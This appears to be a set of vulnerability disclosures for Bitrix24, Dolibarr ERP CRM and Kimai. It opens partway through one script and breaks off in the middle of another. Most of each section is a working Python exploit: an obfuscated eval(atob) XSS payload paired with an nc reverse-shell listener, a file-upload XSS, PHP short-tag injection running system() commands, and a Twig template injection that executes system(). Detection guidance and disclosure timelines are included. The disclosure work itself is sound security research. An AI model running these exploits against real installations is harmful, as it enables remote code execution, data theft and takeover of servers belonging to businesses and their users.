                "RECUR_PARAM[YEARLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[START_DATE]": "",
                "RECUR_PARAM[REPEAT_TILL]": "",
                "RECUR_PARAM[END_DATE]": "",
                "RECUR_PARAM[LIMIT_REPEAT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_TYPE]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_COUNT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_PERIOD]": "1",
                "RECUR_PARAM[RECURRING_EMAIL_ID]": "22",
                "COMMENTS": "",
                "USER_DESCRIPTION": b"<img src=x onerror\xe2\x80\xa9=eval(atob('"+payload+b"'))>",
                "INVOICE_PRODUCT_DATA": "[{\"ID\":0,\"PRODUCT_NAME\":\"Bitrix Site Manager\",\"PRODUCT_ID\":23,\"QUANTITY\":\"1.0000\",\"MEASURE_CODE\":796,\"MEASURE_NAME\":\"pcs.\",\"PRICE\":\"0.00\",\"PRICE_EXCLUSIVE\":\"0.00\",\"PRICE_NETTO\":\"0.00\",\"PRICE_BRUTTO\":\"0.00\",\"DISCOUNT_TYPE_ID\":1,\"DISCOUNT_RATE\":\"0.00\",\"DISCOUNT_SUM\":\"0.00\",\"TAX_RATE\":\"0.00\",\"TAX_INCLUDED\":\"N\",\"CUSTOMIZED\":\"Y\",\"SORT\":10}]",
                "INVOICE_PRODUCT_DATA_SETTINGS": "{\"ENABLE_DISCOUNT\": \"N\",\"ENABLE_TAX\": \"N\"}",
                "saveAndView": "Save",
                "invoice_id": TARGET_INVOICE_ID
            }
        )
        print(f"[+] Edited invoice {TARGET_INVOICE_ID}")
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = login(s, USERNAME, PASSWORD)
        edit_invoice(s, sessid)
        print(f"[+] Visit this URL as admin to execute attack: {HOST}/crm/invoice/edit/{TARGET_INVOICE_ID}/")
        print("[+] Waiting for reverse shell connection")
        subprocess.run(["nc", "-nvlp", str(LPORT)])
    

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has access to the CRM feature and permission to create and export contacts. This level of access may be granted if the user is in the management board group.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of the byte string \xe2\x80\xa9 in request bodies. The presence of this string together with other characters like < and = indicate possible exploitation of this vulnerability.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1715: (CVE-2023-1715 & CVE-2023-1716) Bitrix24 Stored Cross-Site Scripting (XSS) via Improper Input Neutralization on Invoice Edit Page

Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim's browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop_app/file.ajax.php?action=uploadfile.

**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

High

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1720

**CVE Description**

Lack of mime type response header in Bitrix24 22.0.300 allows authenticated remote attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via uploading a crafted HTML file through /desktop\_app/file.ajax.php?action=uploadfile.

**CWE Classification(s)**

CWE-434 Unrestricted Upload of File with Dangerous Type

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.6 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

None

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Unauthenticated users may use the file upload functionality provided by the /desktop_app/file.ajax.php?action=uploadfile. This endpoint also returns the absolute path of the file on the server, which is of the form $BX_ROOT/upload/tmp/BXTEMP-YYYY-MM-DD/00/bxu/disk/XXX/XXX/default where XXX is a 32 character long hexadecimal string.

As the uploads directory is publicly accessible to the internet, an attacker can determine the URL where Apache will serve their malicious uploaded file. As the uploaded file does not have a file extension, Apache serves the file without a content-type header. Therefore, the browser will have to examine the contents of the response to determine its content type. Thus, if the file contains HTML tags, the browser will render the file as HTML and execute any JavaScript that is present in the file, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that uploads a malicious HTML file that executes JavaScript to display the current domain name.

A sample exploit script is shown below:

    # Bitrix24 Stored XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/desktop_app/file.ajax.php?action=uploadfile
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import random
    
    import requests
    import re
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def preauth(s):
        res = s.get(HOST)
        return re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), res.text).group(
            1
        )
    
    
    def upload(session, sessid, data):
        CID = random.randint(0, pow(10, 5))
        resp = session.post(
            HOST + "/desktop_app/file.ajax.php?action=uploadfile",
            headers={
                "X-Bitrix-Csrf-Token": sessid,
                "X-Bitrix-Site-Id": SITE_ID,
            },
            data={
                "bxu_info[mode]": "upload",
                "bxu_info[CID]": str(CID),
                "bxu_info[filesCount]": "1",
                "bxu_info[packageIndex]": f"pIndex{CID}",
                "bxu_info[NAME]": f"file{CID}",
                "bxu_files[0][name]": f"file{CID}",
            },
            files={
                "bxu_files[0][default]": (
                    "file",
                    data,
                    "text/plain",
                )
            },
            proxies=PROXY,
        ).json()
        return resp["files"][0]["file"]["files"]["default"]["tmp_name"]
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = preauth(s)
        path = upload(s, sessid, "<script>alert(document.domain)</script>")
        print("Uploaded file to " + path)
        relpath = path[path.index("/upload"):]
        print("Check out " + HOST + relpath + " for XSS!")
    

**Exploit Conditions:**

This vulnerability can be exploited by unauthenticated users. However, the victim has to visit a specially crafted URL supplied by the attacker.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of <script> tags and other XSS vectors in uploaded files.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1720: (CVE-2023-1720) Bitrix24 Stored Cross-Site Scripting (XSS) via File Upload

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**Summary:**

**Product**

Dolibarr ERP CRM

**Vendor**

Dolibarr

**Severity**

High

**Affected Versions**

<= 18.0.1

**Tested Versions**

17.0.1, 18.0.1

**CVE Identifier**

CVE-2023-4197

**CVE Description**

Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.

**CWE Classification(s)**

CWE-20: Improper Input Validation

**CAPEC Classification(s)**

CAPEC-248 Command Injection CAPEC-153: Input Data Manipulation

**CVSS3.1 Scoring System:**

**Base Score:** 7.5 (High)  
**Vector String:** CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

High

**Privileges Required (PR)**

Low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview:**

Dolibarr ERP CRM is a web-based software that provides management for the target organization’s activities, such as contacts, suppliers, invoices, orders, stocks, agenda, etc. It is an open-source software suite designed for small, medium or large companies, foundations and freelancers. Administrators can use the fine grained permissions manager to grant permissions to various users based on their operational requirements.

Dolibarr ERP CRM operates as an all-in-one suite, which allows customizability based on the usage needs of the organization. It is highly modular as the administrators simply have to enable modules that they need and disable the ones they do not require. Almost every component is a module, which also means that Dolibarr ERP CRM is highly extensible in terms of features.

**Vulnerability Summary:**

Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for <?php and <?=, allowing usage of the <? short tag for executing PHP code. As a result, an adversary is able to inject unsanitized PHP content into these web pages and achieve code execution via PHP.

**Vulnerability Details:**

There are two ways to exploit this vulnerability, one is to “import” content from a specified URL; the other is to edit an existing page.

The vulnerable code can be found in the function dolKeepOnlyPhpCode(), inside the /core/lib/website.lib.php file. where no checking for the <? tag is done. This function intended purpose is to extract the PHP code from the given string and return it to the caller. The caller would throw an error if this function returns a non-empty string since it indicates the presence of PHP code.

    /core/lib/website.lib.php:
    <?php
    
    function dolKeepOnlyPhpCode($str)
    {
        $str = str_replace('<?=', '<?php', $str);
    
        $newstr = '';
    
        // Split on each opening tag
        //$parts = explode('<?php', $str);
        $parts = preg_split('/'.preg_quote('<?php', '/').'/i', $str);
    
        if (!empty($parts)) {
            $i = 0;
            foreach ($parts as $part) {
                if ($i == 0) {  // The first part is never php code
                    $i++;
                    continue;
                }
                $newstr .= '<?php';
                //split on closing tag
                $partlings = explode('?>', $part, 2);
                if (!empty($partlings)) {
                    $newstr .= $partlings[0].'?>';
                } else {
                    $newstr .= $part.'?>';
                }
            }
        }
        return $newstr;
    }
    

This function takes in a single argument which is the string to sanitize. It first replaces all occurrences of <?= with <?php and subsequently all <?php tags are tokenized, and the string between the opening and optional closing tags are selected and returned to the caller.

In order to achieve RCE, the adversary must first be authenticated with an account and the Website module must be enabled. Then, modify an existing web page to include the <? tag where arbitrary PHP code can be executed. Command execution is achieved by using any of the PHP functions that executes system code (i.e. system()). After the web page is modified successfully, previewing the updated page would trigger the RCE:

**Exploit Conditions:**

This vulnerability can be exploited when the “Website” module is enabled, as well as having access to a low-privilege user account.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. The following is a functional exploit written in Python3 that exploits this vulnerability to achieve remote command execution:

    # Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197)
    # Via: https://TARGET_HOST/website/index.php
    # Author: Poh Jia Hao (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    import sys
    import uuid
    requests.packages.urllib3.disable_warnings()
    
    s = requests.Session()
    
    def check_args():
        global target, username, password, cmd
    
        print("\n===== Dolibarr ERP CRM (v18.0.1) Improper Input Sanitization Vulnerability (CVE-2023-4197) =====\n")
    
        if len(sys.argv) != 5:
            print("[!] Please enter the required arguments like so: python3 {} https://TARGET_URL USERNAME PASSWORD CMD_TO_EXECUTE".format(sys.argv[0]))
            sys.exit(1)
    
        target = sys.argv[1].strip("/")
        username = sys.argv[2]
        password = sys.argv[3]
        cmd = sys.argv[4]
    
    def authenticate():
        global s, csrf_token
    
        print("[+] Attempting to authenticate...")
    
        # GET the CSRF token
        res = s.get(f"{target}/", verify=False)
        csrf_token = re.search("\"anti-csrf-newtoken\" content=\"(.+)\"", res.text).group(1).strip()
    
        # Login
        data = {
            "token": csrf_token,
            "username": username,
            "password": password,
            "actionlogin": "login"
        }
        res = s.post(f"{target}/", data=data, verify=False)
    
        if "Logout" not in res.text:
            print("[!] Authentication failed! Are the credentials valid?")
            sys.exit(1)
        else:
            print("[+] Authenticated successfully!")
    
    def rce():
        # Create web site
        print("[+] Attempting to create a website...")
        website_name = uuid.uuid4().hex
        data = {
            "WEBSITE_REF": website_name,
            "token": csrf_token,
            "action": "addsite",
            "WEBSITE_LANG": "en",
            "addcontainer": "create"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Website - {website_name}" not in res.text:
            print("[!] Website creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created website name: \"{website_name}\"!")
    
        # Create web page
        print("[+] Attempting to create a web page...")
        webpage_name = uuid.uuid4().hex
        data = {
            "website": website_name,
            "token": csrf_token,
            "action": "addcontainer",
            "WEBSITE_TYPE_CONTAINER": "page",
            "WEBSITE_TITLE": "x",
            "WEBSITE_PAGENAME": webpage_name
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if f"Contenair \\'{webpage_name}\\' added" not in res.text:
            print("[!] Web page creation failed!")
            sys.exit(1)
        else:
            print(f"[+] Created web page name: \"{webpage_name}\"!")
    
        # Modify created page
        print("[+] Attempting to modify the web page...")
        webpage_id = re.search(f"<option value=\"(.+)\" .+{webpage_name}", res.text).group(1).strip()
        data = {
            "website": website_name,
            "WEBSITE_PAGENAME": webpage_name,
            "pageid": webpage_id,
            "token": csrf_token,
            "action": "updatemeta",
            "htmlheader": f"<? echo system('{cmd}'); ?>"
        }
        res = s.post(f"{target}/website/index.php", data=data, verify=False)
        if "Saved" not in res.text:
            print("[!] Web page modification failed!")
            sys.exit(1)
        else:
            print("[+] Web page modified successfully!")      
    
        # Trigger RCE
        print(f"[+] Triggering RCE now via: {target}/public/website/index.php?website={website_name}&pageref={webpage_name}")
        res = s.get(f"{target}/public/website/index.php?website={website_name}&pageref={webpage_name}", verify=False)
        if res.status_code != 200:
            print("[!] Web page is not reachable!")
            sys.exit(1)
        else:
            output = re.findall("block -->\n(.+)</head>", res.text, re.MULTILINE | re.DOTALL)[0].strip()
            print(f"[+] RCE successful! Output of command:\n\n{output}")
    
    def main():
        check_args()
        authenticate()
        rce()
    
    if __name__ == "__main__":
        main()
    

**Suggested Mitigations:**

Update the Dolibarr installation to the latest version as shown from the official repository releases page.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by checking the /document/ directory (default upload directory) to see if there are any .tpl files containing <? tags, and further inspecting the code contained within.

**Credits:**

Poh Jia Hao (@Chocologicall) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline:**

*   2023-09-04 Reported vulnerability to Dolibarr owner
*   2023-09-05 Dolibarr owner acknowledged vulnerability and pushed a patch commit. Also mentioned that it will be in the next release
*   2023-10-11 New version containing patch released
*   2023-11-01 Public Release

CVE-2023-4197: (CVE-2023-4197) Dolibarr ERP CRM (

Kimai is a web-based multi-user time-tracking application. Versions 2.1.0 and prior are vulnerable to a Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software's PDF and HTML rendering functionalities. As of time of publication, no patches or known workarounds are available.

The laters version of Kimai is found to be vulnerable to a critical Server-Side Template Injection (SSTI) which can be escalated to Remote Code Execution (RCE). The vulnerability arises when a malicious user uploads a specially crafted Twig file, exploiting the software's PDF and HTML rendering functionalities.

The vulnerability is triggered when the software attempts to render invoices, allowing the attacker to execute arbitrary code on the server.

Steps to Reproduce (Manually):  
1- Upload a malicious Twig file to the server containing the following payload {{['id>/tmp/pwned']|map('system')|join}}  
2- Trigger the SSTI vulnerability by downloading the invoices.  
3- The malicious code gets executed, leading to RCE.  
4- /tmp/pwned file will be created on the target system

import requests
import re
import string
import random
import sys

session \= requests.session()
BASE\_URL \= sys.argv\[1\]

def generate(size\=6, chars\=string.ascii\_uppercase + string.digits):
    return ''.join(random.choice(chars) for \_ in range(size))

def get\_csrf(path, session):
    try:
        project\_id \= ""
        csrf\_token \= ""
        preview\_id \= ""
        template\_ids \= \[\]
        activity\_customer\_list \= \[\]
        
        csrf\_login\_response \= session.get(f"{BASE\_URL}{path}").text
        
        \# Extract CSRF Token
        pattern \= re.compile(r'<input\[^>\]\*?name=\["\\'\].\*?token\[^"\\'\]\*\["\\'\]\[^>\]\*?value=\["\\'\](.\*?)\["\\'\]\[^>\]\*?>', re.IGNORECASE)
        match \= pattern.search(csrf\_login\_response)
        if match:
            csrf\_token \= match.group(1)
        
        if "performSearch" in path:
            preview\_pattern \= re.compile(r'<div\[^>\]\*id="preview-token"\[^>\]\*data-value="(.\*?)"\[^>\]\*>', re.IGNORECASE)
            preview\_match \= preview\_pattern.search(csrf\_login\_response)
            if preview\_match:
                preview\_id \= preview\_match.group(1)

        
        template\_pattern \= re.compile(r'<option value="(\\d+)" selected="selected">', re.IGNORECASE)
        template\_matches \= template\_pattern.findall(csrf\_login\_response)
        if template\_matches:
            template\_ids \= \[int(id) for id in template\_matches\]
        
        if "timesheet" in path:
            option\_pattern \= re.compile(r'<option value="(\\d+)" data-customer="(\\d+)" data-currency="EUR">', re.IGNORECASE)
            option\_matches \= option\_pattern.findall(csrf\_login\_response)
            if option\_matches:
                activity\_customer\_list \= \[(int(activity\_id), int(customer\_id)) for activity\_id, customer\_id in option\_matches\]
        
        if "project" in path or "activity" in path:
            project\_id\_match \= re.search(r'<option value="(\\d+)"\[^>\]\*data-currency="EUR"\[^>\]\*>', csrf\_login\_response)
            if project\_id\_match:
                project\_id \= project\_id\_match.group(1)
        
        return csrf\_token, project\_id, preview\_id, template\_ids, activity\_customer\_list
    
    except Exception as e:
        print(f"Error occurred: {e}")
        return None, None, None, None, None

def login(username,password,csrf,session):
    try:
        params \= {"\_username": username, "\_password": password, "\_csrf\_token": csrf}
        login\_response \= session.post(f"{BASE\_URL}/login\_check", data\=params, allow\_redirects\=True)
        if "I forgot my password" not in login\_response.text:
            print(f"\[+\] Logged in: {username}")
            return session
        else:
            print("Wrong username,password", username)
            exit(1)
    except Exception as e:
        print(str(e))
        pass

def create\_customer(token,name,session):
    try:

        data \= {
            'customer\_edit\_form\[name\]': (None, name),
            'customer\_edit\_form\[color\]': (None, ''),
            'customer\_edit\_form\[comment\]': (None, 'xx'),
            'customer\_edit\_form\[address\]': (None, 'xx'),
            'customer\_edit\_form\[company\]': (None, ''),
            'customer\_edit\_form\[number\]': (None, '0002'),
            'customer\_edit\_form\[vatId\]': (None, ''),
            'customer\_edit\_form\[country\]': (None, 'DE'),
            'customer\_edit\_form\[currency\]': (None, 'EUR'),
            'customer\_edit\_form\[timezone\]': (None, 'UTC'),
            'customer\_edit\_form\[contact\]': (None, ''),
            'customer\_edit\_form\[email\]': (None, ''),
            'customer\_edit\_form\[homepage\]': (None, ''),
            'customer\_edit\_form\[mobile\]': (None, ''),
            'customer\_edit\_form\[phone\]': (None, ''),
            'customer\_edit\_form\[fax\]': (None, ''),
            'customer\_edit\_form\[budget\]': (None, '0.00'),
            'customer\_edit\_form\[timeBudget\]': (None, '0:00'),
            'customer\_edit\_form\[budgetType\]': (None, ''),
            'customer\_edit\_form\[visible\]': (None, '1'),
            'customer\_edit\_form\[billable\]': (None, '1'),
            'customer\_edit\_form\[invoiceTemplate\]': (None, ''),
            'customer\_edit\_form\[invoiceText\]': (None, ''),
            'customer\_edit\_form\[\_token\]': (None, token),
        }


        response \= session.post(f"{BASE\_URL}/admin/customer/create", files\=data)

    except Exception as e:
        print(str(e))

def create\_project(token, name,project\_id ,session):
    try:
        form\_data \= {
            'project\_edit\_form\[name\]': (None, name),
            'project\_edit\_form\[color\]': (None, ''),
            'project\_edit\_form\[comment\]': (None, ''),
            'project\_edit\_form\[customer\]': (None, project\_id), 
            'project\_edit\_form\[orderNumber\]': (None, ''),
            'project\_edit\_form\[orderDate\]': (None, ''),
            'project\_edit\_form\[start\]': (None, ''),
            'project\_edit\_form\[end\]': (None, ''),
            'project\_edit\_form\[budget\]': (None, '0.00'),
            'project\_edit\_form\[timeBudget\]': (None, '0:00'),
            'project\_edit\_form\[budgetType\]': (None, ''),
            'project\_edit\_form\[visible\]': (None, '1'),
            'project\_edit\_form\[billable\]': (None, '1'),
            'project\_edit\_form\[globalActivities\]': (None, '1'),
            'project\_edit\_form\[invoiceText\]': (None, ''),
            'project\_edit\_form\[\_token\]': (None, token)
        }
        
        response \= session.post(f"{BASE\_URL}/admin/project/create", files\=form\_data)
        
    except Exception as e:
        print(str(e))

def create\_activity(token, name,project\_id ,session):
    try:
        form\_data \= {
            'activity\_edit\_form\[name\]': (None, name),
            'activity\_edit\_form\[color\]': (None, ''),
            'activity\_edit\_form\[comment\]': (None, ''),
            'activity\_edit\_form\[project\]': (None, ''),
            'activity\_edit\_form\[budget\]': (None, '0.00'),
            'activity\_edit\_form\[timeBudget\]': (None, '0:00'),
            'activity\_edit\_form\[budgetType\]': (None, ''),
            'activity\_edit\_form\[visible\]': (None, '1'),
            'activity\_edit\_form\[billable\]': (None, '1'),
            'activity\_edit\_form\[invoiceText\]': (None, ''),
            'activity\_edit\_form\[\_token\]': (None, token),
        }
        
        response \= session.post(f"{BASE\_URL}/admin/activity/create", files\=form\_data)
        
        if response.status\_code \== 201:
            print(f"\[+\] Activity created: {name}")

    except Exception as e:
        print(f"An error occurred: {str(e)}")

def upload\_malicious\_document(token,session):
    try:
        form\_data \= {
            'invoice\_document\_upload\_form\[document\]': ('din.pdf.twig', f"<html><body>{{{{\['{sys.argv\[4\]}'\]|map('system')|join}}}}</body></html>", 'text/x-twig'),
            'invoice\_document\_upload\_form\[\_token\]': (None, token)
        }
        
        response \= session.post(f"{BASE\_URL}/invoice/document\_upload", files\=form\_data)
        
        if ".pdf.twig" in response.text:
            print("\[+\] Twig uploaded successfully!")
        else:
            print("\[-\] Error while uploading, exiting..")
            exit(1)

    except Exception as e:
        print(f"An error occurred: {str(e)}")
import re

def create\_malicious\_template(token, name, session):
    try:
        data \= {
            'invoice\_template\_form\[name\]': name,
            'invoice\_template\_form\[title\]': name,
            'invoice\_template\_form\[company\]': name,
            'invoice\_template\_form\[vatId\]': '',
            'invoice\_template\_form\[address\]': '',
            'invoice\_template\_form\[contact\]': '',
            'invoice\_template\_form\[paymentTerms\]': '',
            'invoice\_template\_form\[paymentDetails\]': '',
            'invoice\_template\_form\[dueDays\]': '30',
            'invoice\_template\_form\[vat\]': '0.000',
            'invoice\_template\_form\[language\]': 'en',
            'invoice\_template\_form\[numberGenerator\]': 'default',
            'invoice\_template\_form\[renderer\]': 'din',
            'invoice\_template\_form\[calculator\]': 'default',
            'invoice\_template\_form\[\_token\]': token
        }
        
        response \= session.post(f"{BASE\_URL}/invoice/template/create", data\=data)
        
        \# Define the regex pattern to capture the template ID and match the name
        pattern \= re.compile(fr'<tr class="modal-ajax-form open-edit" data-href="/en/invoice/template/(\\d+)/edit">\\s\*<td class="alwaysVisible col\_name">{re.escape(name)}</td>', re.DOTALL)
        
        \# Search the response text with the regex pattern
        match \= pattern.search(response.text)
        
        if match:
            template\_id \= match.group(1)  \# Extract the captured group
            print(f"\[+\] Malicious Template: {name}, Template ID: {template\_id}")
            return template\_id  \# Return the captured template ID
        else:
            print("\[-\] Failed to capture the template ID")
            create\_malicious\_template(token,name,session)
        
    except Exception as e:
        print(f"An error occurred: {str(e)}")
        exit(1)

def create\_timesheet(token, activity, project, session):
    form\_data \= {
            'timesheet\_edit\_form\[begin\_date\]': (None, '01/01/1980'),
            'timesheet\_edit\_form\[begin\_time\]': (None, '12:00 AM'),
            'timesheet\_edit\_form\[duration\]': (None, '0:15'),
            'timesheet\_edit\_form\[end\_time\]': (None, '12:15 AM'),
            'timesheet\_edit\_form\[customer\]': (None, ''),
            'timesheet\_edit\_form\[project\]': (None, project),
            'timesheet\_edit\_form\[activity\]': (None, activity),
            'timesheet\_edit\_form\[description\]': (None, ''),
            'timesheet\_edit\_form\[fixedRate\]': (None, ''),
            'timesheet\_edit\_form\[hourlyRate\]': (None, ''),
            'timesheet\_edit\_form\[billableMode\]': (None, 'auto'),
            'timesheet\_edit\_form\[\_token\]': (None, token)
        }
    response \= session.post(f"{BASE\_URL}/timesheet/create", files\=form\_data,allow\_redirects\=False)
    if response.status\_code \== 302:  \# Changed to 200 as 301 is for redirection
        print(f"\[+\] Created a new timesheet")

##############################

\# login
csrf, \_, \_, \_, \_ \= get\_csrf("/login", session) 
\# login("admin", "password", csrf, session)
login(sys.argv\[2\],sys.argv\[3\],csrf,session)
\# create new customer

get\_customer\_token, \_, \_, \_, \_ \= get\_csrf("/admin/customer/create", session)  
customer\_name \= generate()
create\_customer(get\_customer\_token, customer\_name, session)
\# create new project with customer\_name

get\_project\_token, customer\_id, \_, \_, \_ \= get\_csrf("/admin/project/create", session)  
project\_name \= generate()
create\_project(get\_project\_token, project\_name, customer\_id, session)

\# create new activity 
get\_activity\_token, project\_id, \_, \_, \_ \= get\_csrf("/admin/activity/create", session)
activity\_name \= generate()
create\_activity(get\_activity\_token, activity\_name, project\_id, session)

\# EXPLOIT
######################

\# upload malicious file
upload\_token, \_, \_, \_, \_ \= get\_csrf("/invoice/document\_upload", session)
upload\_malicious\_document(upload\_token, session)

\# create malicious template to trigger the SSTI
get\_template\_token, \_, \_, \_, \_ \= get\_csrf("/invoice/template/create", session)
template \= generate()
temp\_id \= create\_malicious\_template(get\_template\_token, template, session)

\# create a timesheet with project\_id and activity\_id
activity\_customer\_list \= get\_csrf("/timesheet/create", session)\[4\]  \# get the activity\_customer\_list from get\_csrf function

print(f"\[+\] Constructing renderer URLs..")
\# iterate through all relative project\_ids and customer\_id for exploit stabiliy
for activity\_id, customer\_id in activity\_customer\_list:
    csrf \= get\_csrf("/timesheet/create", session)\[0\]  \# Update CSRF token for each iteration
    print(f"\[+\] Creating timesheets with: Activity ID: {activity\_id}, Customer ID: {customer\_id}")
    create\_timesheet(csrf, activity\_id, customer\_id, session)
    postData \= {
        "searchTerm": "",
        "daterange": "",
        "state": "1",
        "billable": "0",
        "exported": "1",
        "orderBy": "begin",
        "order": "DESC",
        "exporter": "pdf"
    }
    \# export timesheets so they appear in exported invoices
    export \= session.post(f"{BASE\_URL}/timesheet/export/", data\=postData).text
    if "PDF-1.4" in export:
        csrf, \_, \_, \_, \_ \= get\_csrf("/invoice/", session)
        \# get preview token to construct the preview URL to trigger SSTI
        csrf, project\_id, preview\_id, template\_ids, activity\_customer\_list \= get\_csrf(f"/invoice/?searchTerm=&daterange=&exported=1&invoiceDate=1%2F1%2F1980&performSearch=performSearch&\_token={csrf}&template={temp\_id}", session)
        for template\_id in template\_ids:
